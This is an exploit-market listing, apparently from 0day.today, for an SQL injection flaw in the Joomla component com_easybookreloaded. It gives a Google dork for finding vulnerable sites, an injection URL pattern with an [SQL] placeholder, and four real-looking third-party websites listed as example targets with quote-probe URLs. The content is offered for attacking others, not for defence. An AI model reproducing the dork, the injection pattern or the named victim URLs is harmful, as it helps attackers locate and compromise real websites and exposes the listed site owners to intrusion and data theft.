[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component com_easybookreloaded Sql Injection Vulnerability

Author
altiiever
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-21049
Category
web applications
Date add
31-07-2013
Platform
php
////////////////////////////////////////////
// Title : Joomla Component com_easybookreloaded Sql Injection Vulnerability
// Date : 30 July 2013
// Version : 1.5x
// Author : Altiiever
// Google dork : inurl:"index.php?option=com_easybookreloaded"
// Download : Search Here -> http://extensions.joomla.org
////////////////////////////////////////////

Vuln
========
http://127.0.0.1/[PATH]index.php?option=com_easybookreloaded&view=[number]

http://127.0.0.1/[PATH]index.php?option=com_easybookreloaded&view=1[SQL]


Example
========
http://www.vololiberoband.it/home/index.php?option=com_easybookreloaded&view=50'
http://www.alucraegitimdernegi.com/index.php?option=com_easybookreloaded&view=easybookreloaded&Itemid=142'
http://www.siefkersawmill.com/index.php?option=com_easybookreloaded&view=easybookreloaded&Itemid=28'
http://ay-pen.com/index.php?option=com_easybookreloaded&view=easybookreloaded&Itemid=66'

#  0day.today [2024-11-15]  #